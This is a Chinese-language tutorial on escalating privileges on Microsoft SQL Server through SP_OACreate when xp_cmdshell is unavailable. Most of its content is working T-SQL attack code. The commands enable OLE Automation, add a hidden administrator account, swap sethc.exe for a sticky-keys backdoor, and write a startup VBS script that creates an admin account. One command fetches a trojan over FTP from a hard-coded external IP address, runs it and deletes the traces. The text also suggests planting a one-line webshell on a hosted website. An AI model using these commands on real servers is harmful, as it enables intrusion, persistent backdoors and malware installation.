SP_OACreate提权经验总结

摘要

5）如果该服务器有网站，则直接用方法4）写入一句话 本文作者：珍惜少年时

在xp_cmdshell被删除或者出错情况下，可以充分利用SP_OACreate进行提权

 
首先
 

EXEC sp_configure 'show advanced options', 1;   RECONFIGURE WITH OVERRIDE;   EXEC sp_configure 'Ole Automation Procedures', 1;   RECONFIGURE WITH OVERRIDE;   EXEC sp_configure 'show advanced options', 0;

 
打开组件，2005中默认关闭
 
1）直接加用户
 
2000系统：
 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 123 123 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 123/add'  

  
 
xp和2003系统：
 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user 123$ 123/add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 123$ /add'  

  
 
2）粘贴键替换
 

declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';   declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';  

需要同时具备sp_oacreate 和sp_oamethod 两个功能组件
 
3）直接传马
 

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%/system32/cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--  

4）启动项写入加账户脚本
 

declare @sp_passwordxieo int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:/RECYCLER/1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';  

5）如果该服务器有网站，则直接用方法4）写入一句话

本文作者：珍惜少年时